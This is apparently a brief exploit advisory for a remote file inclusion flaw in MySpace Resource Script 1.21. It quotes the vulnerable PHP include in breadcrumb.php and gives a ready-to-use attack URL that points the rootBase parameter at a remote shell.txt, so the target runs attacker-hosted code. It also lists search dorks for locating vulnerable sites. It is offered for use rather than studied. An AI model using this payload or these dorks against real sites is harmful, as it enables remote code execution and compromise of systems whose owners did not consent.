MySpace Resource Script (MSRC) version 1.21 suffers from a remote file inclusion vulnerability.
3a6be3baad413c82853a1e0a61150eacf286e74290b5c99729e01567d5923433
MSRS v.1.21 Remote File Inclusion
Author Site : http://www.myspacepros.com/
POC :
/_theme/breadcrumb.php Line No. 3
<?php include($rootBase . '/_inc/breadcrumb.php'); ?>
Usage : http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?
D0rks :
inurl:/Generators/Layout_Generator
"!new Female Celebrities"
inurl:/Generators/Scrollbar_Colors